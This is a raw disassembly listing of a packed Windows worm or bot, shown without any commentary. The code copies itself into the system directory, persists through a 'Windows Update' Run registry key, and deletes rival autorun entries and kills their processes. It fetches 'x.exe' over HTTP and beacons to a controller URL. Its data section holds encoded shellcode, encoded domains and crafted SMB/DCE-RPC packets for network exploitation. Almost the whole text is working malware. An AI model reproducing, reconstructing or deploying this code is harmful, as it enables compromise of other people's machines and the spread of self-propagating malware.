mov byte ptr [ebp+var_4], al
jz short loc_30902657
call sub_30901FCA
mov edi, [ebp+var_4]
cmp edi, eax
jz short loc_30902648
call sub_30902009
test eax, eax
jz short loc_309026B3
push offset dword_30904FD4
call dword_309010D4 ; InterlockedIncrement
push edi
call sub_309017D2
test eax, eax
pop ecx
jnz short loc_309026BA
push edi
push offset sub_30902536
call sub_30901F23
pop ecx
mov [ebp+var_8], 4
pop ecx
loc_3090269F: ; CODE XREF: sub_30902622+8D�j
push edi
push offset sub_3090259A
call sub_30901F23
dec [ebp+var_8]
pop ecx
pop ecx
jnz short loc_3090269F
jmp short loc_309026BA
; ---------------------------------------------------------------------------
loc_309026B3: ; CODE XREF: sub_30902622+51�j
push 2710h
call ebx ; dword_30901094
loc_309026BA: ; CODE XREF: sub_30902622+67�j
; sub_30902622+8F�j
movzx edi, word_30904FDC
call esi ; dword_309010FC
cdq
idiv edi
add edx, edi
push edx
call ebx ; dword_30901094
call sub_3090236F
test eax, eax
jz loc_30902648
pop edi
pop esi
pop ebx
loc_309026DB: ; CODE XREF: sub_30902622+11�j
push 0
call dword_309010D0 ; ExitThread
xor eax, eax
leave
retn 4
sub_30902622 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_309026E9 proc near ; CODE XREF: UPX0:309027B7�p
; UPX0:loc_3090281D�p
var_50 = byte ptr -50h
var_28 = byte ptr -28h
push ebp
mov ebp, esp
sub esp, 50h
push esi
call sub_30901FCA
push eax
call dword_3090115C ; inet_ntoa
mov esi, dword_30901068
push eax
lea eax, [ebp+var_28]
push eax
call esi ; dword_30901068
push dword_30904FCC
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_50]
push offset aHttpSDX_exe ; "http://%s:%d/x.exe"
push eax
call dword_3090111C ; wsprintfA
add esp, 10h
lea eax, [ebp+var_50]
push eax
push offset word_309042BA
call esi ; dword_30901068
push offset byte_309042B8
call dword_30901084 ; lstrlenA
mov byte_309042B8[eax], 0DFh
pop esi
leave
retn
sub_309026E9 endp
; ---------------------------------------------------------------------------
loc_30902745: ; DATA XREF: sub_30902383+16C�o
push ecx
push ecx
push ebx
push ebp
push esi
xor ebx, ebx
push edi
mov dword_30904FD4, ebx
call sub_30902009
mov esi, dword_30901094
mov edi, 1388h
test eax, eax
jnz short loc_30902773
loc_30902767: ; CODE XREF: UPX0:30902771�j
push edi
call esi ; dword_30901094
call sub_30902009
test eax, eax
jz short loc_30902767
loc_30902773: ; CODE XREF: UPX0:30902765�j
lea eax, [esp+14h]
push ebx
push eax
call dword_30901130 ; InternetGetConnectedState
test byte ptr [esp+14h], 2
push 50h
mov dword_30904FD8, ebx
pop ebp
mov word_30904FDC, 96h
jz short loc_309027B0
mov dword_30904FD8, 1
mov ebp, 15Eh
mov word_30904FDC, 14h
loc_309027B0: ; CODE XREF: UPX0:30902796�j
call sub_30901FCA
mov ebx, eax
call sub_309026E9
cmp ebx, 100007Fh
jz short loc_309027D1
push ebx
push offset sub_30902536
call sub_30901F23
pop ecx
pop ecx
loc_309027D1: ; CODE XREF: UPX0:309027C2�j
mov dword ptr [esp+10h], 4
loc_309027D9: ; CODE XREF: UPX0:309027EA�j
push ebx
push offset sub_3090259A
call sub_30901F23
dec dword ptr [esp+18h]
pop ecx
pop ecx
jnz short loc_309027D9
test ebp, ebp
jle short loc_30902801
loc_309027F0: ; CODE XREF: UPX0:309027FF�j
push 0
push offset sub_30902622
call sub_30901F23
pop ecx
dec ebp
pop ecx
jnz short loc_309027F0
loc_30902801: ; CODE XREF: UPX0:309027EE�j
; UPX0:3090280D�j ...
call sub_30902009
test eax, eax
jz short loc_3090280F
push edi
call esi ; dword_30901094
jmp short loc_30902801
; ---------------------------------------------------------------------------
loc_3090280F: ; CODE XREF: UPX0:30902808�j
; UPX0:3090281B�j
call sub_30902009
test eax, eax
jnz short loc_3090281D
push edi
call esi ; dword_30901094
jmp short loc_3090280F
; ---------------------------------------------------------------------------
loc_3090281D: ; CODE XREF: UPX0:30902816�j
call sub_309026E9
jmp short loc_30902801
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30902824 proc near ; CODE XREF: sub_309029BD+8C�p
; sub_30902B37+11A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
push 0F003Fh
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3090100C ; RegOpenKeyExA
test eax, eax
jnz short loc_30902857
push [ebp+arg_8]
push [ebp+arg_4]
call dword_30901010 ; RegDeleteValueA
push [ebp+arg_4]
call dword_30901014 ; RegCloseKey
loc_30902857: ; CODE XREF: sub_30902824+1C�j
pop ebp
retn
sub_30902824 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30902859 proc near ; CODE XREF: sub_30902195+33�p
; sub_309029BD+7D�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_10]
push esi
mov [ebp+var_4], eax
lea eax, [ebp+arg_10]
push eax
xor esi, esi
push 0F003Fh
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3090100C ; RegOpenKeyExA
test eax, eax
jz short loc_30902885
push 1
pop eax
jmp short loc_309028AF
; ---------------------------------------------------------------------------
loc_30902885: ; CODE XREF: sub_30902859+25�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+arg_4]
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_8]
push [ebp+arg_10]
call dword_30901008 ; RegQueryValueExA
test eax, eax
jz short loc_309028A4
push 2
pop esi
loc_309028A4: ; CODE XREF: sub_30902859+46�j
push [ebp+arg_10]
call dword_30901014 ; RegCloseKey
mov eax, esi
loc_309028AF: ; CODE XREF: sub_30902859+2A�j
pop esi
leave
retn
sub_30902859 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_309028B2 proc near ; CODE XREF: sub_30902A6B+96�p
; sub_30902B37+7C�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push esi
xor esi, esi
lea eax, [ebp+arg_4]
push esi
push eax
push esi
push 0F003Fh
push esi
push esi
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_30901000 ; RegCreateKeyExA
test eax, eax
jz short loc_309028DB
push 1
pop eax
jmp short loc_30902902
; ---------------------------------------------------------------------------
loc_309028DB: ; CODE XREF: sub_309028B2+22�j
push [ebp+arg_10]
push [ebp+arg_C]
push 1
push esi
push [ebp+arg_8]
push [ebp+arg_4]
call dword_30901004 ; RegSetValueExA
test eax, eax
jz short loc_309028F7
push 2
pop esi
loc_309028F7: ; CODE XREF: sub_309028B2+40�j
push [ebp+arg_4]
call dword_30901014 ; RegCloseKey
mov eax, esi
loc_30902902: ; CODE XREF: sub_309028B2+27�j
pop esi
pop ebp
retn
sub_309028B2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30902905 proc near ; CODE XREF: sub_309029BD+98�p
var_128 = dword ptr -128h
var_120 = dword ptr -120h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 128h
push ebx
mov ebx, [ebp+arg_0]
push esi
push ebx
call dword_30901084 ; lstrlenA
mov esi, eax
dec esi
test esi, esi
jle loc_309029B9
loc_30902925: ; CODE XREF: sub_30902905+27�j
cmp byte ptr [esi+ebx], 5Ch
jz short loc_3090292E
dec esi
jns short loc_30902925
loc_3090292E: ; CODE XREF: sub_30902905+24�j
push 0
push 2
call sub_30902CFC ; CreateToolhelp32Snapshot
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_309029B9
push 128h
lea eax, [ebp+var_128]
push 0
push eax
call sub_30902CA6 ; memset
add esp, 0Ch
lea eax, [ebp+var_128]
mov [ebp+var_128], 128h
push eax
push [ebp+arg_0]
call sub_30902CF6 ; Process32First
test eax, eax
jz short loc_309029B9
lea esi, [esi+ebx+1]
loc_30902976: ; CODE XREF: sub_30902905+B2�j
lea eax, [ebp+var_104]
push eax
push esi
call dword_30901104 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_309029A6
push [ebp+var_120]
push 0
push 1F0FFFh
call dword_309010B0 ; OpenProcess
push 0
push eax
call dword_30901060 ; TerminateProcess
loc_309029A6: ; CODE XREF: sub_30902905+83�j
lea eax, [ebp+var_128]
push eax
push [ebp+arg_0]
call sub_30902CF0 ; Process32Next
test eax, eax
jnz short loc_30902976
loc_309029B9: ; CODE XREF: sub_30902905+1A�j
; sub_30902905+38�j ...
pop esi
pop ebx
leave
retn
sub_30902905 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_309029BD proc near ; CODE XREF: UPX0:3090234C�p
var_138 = byte ptr -138h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 138h
push ebx
push esi
lea eax, [ebp+var_30]
push edi
mov [ebp+var_30], offset aWindowsSecurit ; "Windows Security Manager"
mov [ebp+var_2C], offset aDiskDefragment ; "Disk Defragmenter"
mov [ebp+var_28], offset aSystemRestoreS ; "System Restore Service"
mov [ebp+var_24], offset aBotLoader ; "Bot Loader"
mov [ebp+var_20], offset aSystray ; "SysTray"
mov [ebp+var_1C], offset aWinupdate ; "WinUpdate"
mov [ebp+var_18], offset aWindowsUpdateS ; "Windows Update Service"
mov [ebp+var_14], offset aAvserve_exe ; "avserve.exe"
mov [ebp+var_10], offset aAvserve2_exeup ; "avserve2.exeUpdate Service"
mov [ebp+var_C], offset aMsConfigV13 ; "MS Config v13"
mov [ebp+var_4], eax
mov [ebp+var_8], 0Ah
mov edi, offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
mov esi, 80000002h
loc_30902A26: ; CODE XREF: sub_309029BD+A7�j
mov eax, [ebp+var_4]
push 104h
mov ebx, [eax]
lea eax, [ebp+var_138]
push eax
push ebx
push edi
push esi
call sub_30902859
add esp, 14h
test eax, eax
jnz short loc_30902A5D
push ebx
push edi
push esi
call sub_30902824
lea eax, [ebp+var_138]
push eax
call sub_30902905
add esp, 10h
loc_30902A5D: ; CODE XREF: sub_309029BD+87�j
add [ebp+var_4], 4
dec [ebp+var_8]
jnz short loc_30902A26
pop edi
pop esi
pop ebx
leave
retn
sub_309029BD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30902A6B proc near ; CODE XREF: sub_30902B37+D1�p
; sub_30902B37+132�p
var_78 = byte ptr -78h
var_14 = byte ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 78h
cmp [ebp+arg_0], 0
jz short loc_30902A80
push [ebp+arg_0]
call dword_30901074 ; DeleteFileA
loc_30902A80: ; CODE XREF: sub_30902A6B+A�j
lea eax, [ebp+var_78]
push 63h
push eax
call dword_3090108C ; GetSystemDirectoryA
test eax, eax
jz locret_30902B35
push esi
call dword_309010FC ; rand
and eax, 3
add eax, 5
push eax
lea eax, [ebp+var_14]
push eax
call sub_30901F44
mov esi, dword_30901088
pop ecx
pop ecx
lea eax, [ebp+var_14]
push offset dword_309041F0
push eax
call esi ; dword_30901088
lea eax, [ebp+var_78]
push offset dword_309041F8
push eax
call esi ; dword_30901088
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_78]
push eax
call esi ; dword_30901088
lea eax, [ebp+var_78]
push 0
push eax
push [ebp+arg_4]
call dword_30901050 ; CopyFileA
lea eax, [ebp+var_78]
push eax
call dword_30901084 ; lstrlenA
inc eax
push eax
lea eax, [ebp+var_78]
push eax
push offset aWindowsUpdate ; "Windows Update"
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call sub_309028B2
add esp, 14h
push dword_30904FC4
call dword_3090107C ; CloseHandle
lea eax, [ebp+var_78]
push 0
push eax
call dword_30901054 ; WinExec
push 1F4h
call dword_30901094 ; Sleep
push 0
call dword_309010E0 ; ExitProcess
pop esi
locret_30902B35: ; CODE XREF: sub_30902A6B+23�j
leave
retn
sub_30902A6B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30902B37 proc near ; CODE XREF: UPX0:30902351�p
var_E8 = byte ptr -0E8h
var_84 = byte ptr -84h
var_20 = byte ptr -20h
push ebp
mov ebp, esp
sub esp, 0E8h
push ebx
push esi
push edi
lea eax, [ebp+var_84]
push 63h
push eax
push 0
call dword_30901048 ; GetModuleFileNameA
test eax, eax
jz loc_30902C70
and dword_30904FE0, 0
lea eax, [ebp+var_20]
push 1Dh
push eax
mov edi, offset aSoftwareMicr_0 ; "Software\\Microsoft\\Wireless"
push offset aId ; "ID"
mov esi, 80000002h
push edi
push esi
call sub_30902859
add esp, 14h
test eax, eax
jz short loc_30902BBD
call dword_309010FC ; rand
push 0Ah
mov ebx, offset aFgnsdrjyrsert ; "fgnsdrjyrsert"
cdq
pop ecx
idiv ecx
add edx, ecx
push edx
push ebx
call sub_30901F44
pop ecx
pop ecx
push ebx
call dword_30901084 ; lstrlenA
inc eax
push eax
push ebx
push offset aId ; "ID"
push edi
push esi
call sub_309028B2
add esp, 14h
jmp short loc_30902BCC
; ---------------------------------------------------------------------------
loc_30902BBD: ; CODE XREF: sub_30902B37+4D�j
lea eax, [ebp+var_20]
push eax
push offset aFgnsdrjyrsert ; "fgnsdrjyrsert"
call dword_30901068 ; lstrcpyA
loc_30902BCC: ; CODE XREF: sub_30902B37+84�j
lea eax, [ebp+var_E8]
push 63h
push eax
push offset aWindowsUpdate ; "Windows Update"
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push esi
call sub_30902859
add esp, 14h
test eax, eax
jz short loc_30902C12
push 2
push offset a1 ; "1"
push offset aClient ; "Client"
push edi
push esi
call sub_309028B2
lea eax, [ebp+var_84]
push eax
push 0
call sub_30902A6B
add esp, 1Ch
jmp short loc_30902C70
; ---------------------------------------------------------------------------
loc_30902C12: ; CODE XREF: sub_30902B37+B3�j
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_E8]
push eax
call dword_3090104C ; lstrcmpiA
test eax, eax
jnz short loc_30902C5B
lea eax, [ebp+var_20]
push 1Dh
mov ebx, offset aClient ; "Client"
push eax
push ebx
push edi
push esi
call sub_30902859
add esp, 14h
test eax, eax
jnz short loc_30902C70
push ebx
push edi
push esi
mov dword_30904FE0, 1
call sub_30902824
add esp, 0Ch
jmp short loc_30902C70
; ---------------------------------------------------------------------------
loc_30902C5B: ; CODE XREF: sub_30902B37+F1�j
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_E8]
push eax
call sub_30902A6B
pop ecx
pop ecx
loc_30902C70: ; CODE XREF: sub_30902B37+1F�j
; sub_30902B37+D9�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_30902B37 endp
; =============== S U B R O U T I N E =======================================
sub_30902C75 proc near ; CODE XREF: sub_309011A0+CA�p
; sub_309015C7+11�p ...
arg_0 = dword ptr 4
push 4
push 1000h
push [esp+8+arg_0]
push 0
call dword_30901044 ; VirtualAlloc
retn
sub_30902C75 endp
; =============== S U B R O U T I N E =======================================
sub_30902C89 proc near ; CODE XREF: sub_309011A0+10B�p
; sub_309015C7+BD�p
arg_0 = dword ptr 4
push 8000h
push 0
push [esp+8+arg_0]
call dword_30901040 ; VirtualFree
retn
sub_30902C89 endp
; ---------------------------------------------------------------------------
align 10h
loc_30902CA0: ; DATA XREF: sub_30901422+A�o
; sub_30902383+A�o
jmp dword ptr loc_30901100
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_30902CA6 proc near ; CODE XREF: sub_309017D2+128�p
; sub_309017D2+134�p ...
jmp dword_309010F8
sub_30902CA6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_30902CAC proc near ; CODE XREF: sub_309017D2+9C�p
; sub_309017D2+C5�p ...
jmp dword_309010F4
sub_30902CAC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_30902CB2 proc near ; CODE XREF: sub_309017D2+93�p
; sub_309017D2+B2�p ...
jmp dword_309010F0
sub_30902CB2 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_30902CC0 proc near ; CODE XREF: sub_309017D2+8�p
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_30902CE0
loc_30902CCC: ; CODE XREF: sub_30902CC0+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_30902CCC
loc_30902CE0: ; CODE XREF: sub_30902CC0+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_30902CC0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_30902CF0 proc near ; CODE XREF: sub_30902905+AB�p
jmp dword_30901064
sub_30902CF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_30902CF6 proc near ; CODE XREF: sub_30902905+64�p
jmp dword_3090105C
sub_30902CF6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_30902CFC proc near ; CODE XREF: sub_30902905+2D�p
jmp dword_30901058
sub_30902CFC endp
; ---------------------------------------------------------------------------
db 2 dup(0CCh)
dd 4BFh dup(0)
dword_30904000 dd 206h, 2400h, 31415352h, 180h, 10001h, 11838DF5h, 2AEC5279h
; DATA XREF: sub_30901422+112�o
dd 0E7F63AE4h, 0E0EA9B49h, 0DB21AFBEh, 1A95447Eh, 0A032615Eh
dd 9F6A1F85h, 3994FF94h, 8F26A684h, 5C1DCE35h, 0B20BC9A5h
dd 3072657Ah, 0
aMozilla4_0Co_0 db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
; DATA XREF: sub_309015C7+84�o
align 10h
byte_30904080 db 0 ; DATA XREF: sub_3090169C+C�r
off_30904081 dd offset dword_309041E4 ; DATA XREF: sub_3090169C+14�r
align 2
dd offset dword_309041D4
dw 0C401h
dd 1309041h, 309041B4h, 9041A000h, 41900130h, 80013090h
dd 309041h, 30904174h, 90416800h, 41580130h, 48003090h
dd 1309041h, 3090413Ch, 90417400h, 41D40130h, 30003090h
dd 309041h, 309041D4h, 90412001h, 41480030h, 10013090h
dd 309041h, 30904130h, 90410001h, 40F80130h, 74003090h
dd 309041h, 30904130h, 2E767663h, 7572h, 2E777777h, 6C646572h
dd 2E656E69h, 7572h, 656C6966h, 72616573h, 722E6863h, 75h
dd 6F626F72h, 61686378h, 2E65676Eh, 6D6F63h, 68746566h
dd 2E647261h, 7A6962h, 63657361h, 2E616B68h, 7572h, 7473616Dh
dd 782D7265h, 6D6F632Eh, 0
dd 6F6C6F63h, 61622D72h, 722E6B6Eh, 75h, 6B76616Bh, 742E7A61h
dd 76h, 74757263h, 6E2E706Fh, 75h, 6F64696Bh, 61622D73h
dd 722E6B6Eh, 75h, 65726170h, 61622D78h, 722E6B6Eh, 75h
dd 6C756461h, 6D652D74h, 65726970h, 6D6F632Eh, 0
dd 666E6F6Bh, 616B7369h, 726F2E74h, 67h, 69746963h, 6E61622Dh
dd 75722E6Bh, 0
dword_309041D4 dd 72617778h, 6A632E65h, 656E2E62h, 74hdword_309041E4 dd 617A616Dh, 616B6166h, 75722Ehdword_309041F0 dd 6578652Eh, 0 ; sub_3090204F+55�o ...
dword_309041F8 dd 5Ch ; sub_30902A6B+56�o
aMozilla4_0Comp db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
; DATA XREF: sub_309011A0+13�o
align 10h
aAbcdefghijkl_0 db 'abcdefghijklmnopqrstuvwxyz',0 ; DATA XREF: sub_30901316+1C�o
align 4
aAbcdefghijklmn db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',0 ; DATA XREF: sub_30901316+C�o
align 4
aZer0 db 'zer0',0 ; DATA XREF: sub_30901422+34�o
align 10h
aHttpS db 'http://%s',0 ; DATA XREF: sub_309015C7+71�o
align 4
aHttpSIndex_php db 'http://%s/index.php?id=%s&scn=%d&inf=%d&ver=17&cnt=%s',0
; DATA XREF: sub_309015C7+57�o
align 8
byte_309042B8 db 0EBh ; DATA XREF: sub_309017D2+24E�o
; sub_309017D2+260�o ...
db 58h
word_309042BA dw 7468h ; DATA XREF: sub_309026E9+40�o
dd 2F3A7074h, 3732312Fh, 302E302Eh, 383A312Eh, 652F3030h
dd 6578652Eh, 4 dup(0DFDFDFDFh), 7A6F4DDFh, 616C6C69h
dd 302E342Fh, 0C9335DDFh, 1EEB966h, 8B05758Dh, 3C068AFEh
dd 46057599h, 302C068Ah, 88993446h, 0EDE24707h, 0DAE80AEBh
dd 2EFFFFFFh, 2E676562h, 0C9999371h, 0C999C999h, 91BDFD12h
dd 0C99916FDh, 0AA6872C1h, 0AA66FD42h, 14BA10FDh, 9998A91Ch
dd 0C9C999C9h, 98F198F3h, 9986C999h, 98C071C9h, 0C999C999h
dd 37CB5F90h, 1C965992h, 99C99978h, 14C999C9h, 7D7157E4h
dd 0C999C999h, 0E414C999h, 9945713Ah, 99C999C9h, 0F19DF3C9h
dd 9989C999h, 0F1C999C9h, 0C999C999h, 0F3C9999Ch, 0B371C999h
dd 99C99998h, 0E3F367C9h, 0DC1C10F0h, 99C99998h, 0C959B2C9h
dd 0C99BF3C9h, 0C999F1C9h, 0C999C999h, 0A10414D9h, 99C99998h
dd 9E71CAC9h, 99C99998h, 61688DC9h, 0AD1C1091h, 99C99998h
dd 66611AC9h, 99111D96h, 99C999C9h, 0C850B2C9h, 98F3C8C8h
dd 0C957DC14h, 0C9992571h, 0C999C999h, 91C0A44Eh, 59924912h
dd 59B2F7EDh, 0C9C9C9C9h, 0CA3AC414h, 993B71CBh, 99C999C9h
dd 0E424FFC9h, 0ED599221h, 0F1CDCDCFh, 0C999C999h, 66C9999Ch
dd 9998DC2Ch, 0C9C999C9h, 0C9991E71h, 0C999C999h, 83B8B0FBh
dd 5D12CDC3h, 0C9C999F3h, 0DC2C66CBh, 99C99998h, 0AD2C66C9h
dd 99C99998h, 990B71C9h, 99C999C9h, 0A6485AC9h, 2C66C096h
dd 0C99998ADh, 1B71C999h, 0C999C999h, 294CC999h, 9CF3EBA7h
dd 98A10414h, 0C999C999h, 99E971CAh, 99C999C9h, 26F434C9h
dd 0C999F371h, 0C999FC71h, 0C999C999h, 0EF133BF9h, 376B4629h
dd 9966DE5Fh, 0A8EC5AC9h, 99C999AEh, 99C999C9h, 0B7C999C9h
dd 0E9EDFFC5h, 0B7FDE9ECh, 99FCE1FCh, 6 dup(99C999C9h)
dd 0FCF5CAC9h, 0C999E9FCh, 0F7EBFCF2h, 0ABAAF5FCh, 34C7C999h
dd 0B459AAF9h, 662A2A25h, 9093ACC9h, 9CC9B781h, 83639D90h
dd 9271CDC9h, 0C999C999h, 19BFC999h, 0FD145135h, 720A95BDh
dd 0F934C791h, 0C999C871h, 0C999C999h, 12A5D212h, 9AE180D5h
dd 146FAA52h, 0C89A2A8Dh, 9A8B12B9h, 5859AA4Ah, 9BAB9E59h
dd 99A319DBh, 0A26CECC9h, 0ED85BDDDh, 0E8A2DF9Eh, 5544EB81h
dd 9ABDC812h, 8D2E964Ah, 85D812EBh, 9D125A9Ah, 105A9A09h
dd 0F885BDDDh, 98D01C10h, 0C999C999h, 7F664966h, 8712FEFDh
dd 12C999A9h, 0C21295C2h, 12821285h, 0B75A91C2h, 0B7FDF7FCh
dd 0
dword_30904580 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_309017D2+186�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_3090460C dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_309017D2+1BA�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 8
dword_309046B8 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_309017D2+1EE�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_30904798 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_309017D2+8D�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC: ; DATA XREF: sub_309017D2+BF�o
unicode 0, <C$>,0
a????? db '?????',0
dd 0
dword_309047FC dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_309017D2+2D4�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dword_30904868 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_309017D2+308�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_3090490C dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_309017D2+4EE�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
dword_3090498C dd 401495h, 3, 40707Ch, 1, 0 dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dword_30904A20 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_309017D2+347�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_30904A8C dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_309017D2+372�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_30904B00 dd 0 dd 40A89Ah, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 3 dup(0)
dd 586E6957h, 72502050h, 6Fh, 9 dup(0)
db 2 dup(0)
dword_30904BBE dd 1004600h dw 1
dd 69570000h, 206B326Eh, 6F7250h, 0Ah dup(0)
dword_30904BF8 dd 7515123Ch, 2, 326E6957h, 5341206Bh, 0Ah dup(0)
; DATA XREF: sub_309017D2+41B�o
; sub_309017D2+45D�o
dd 123C0000h, 751Ch, 0Eh dup(0)
; ---------------------------------------------------------------------------
loc_30904C70: ; DATA XREF: sub_309017D2+44A�o
jmp short loc_30904C78
; ---------------------------------------------------------------------------
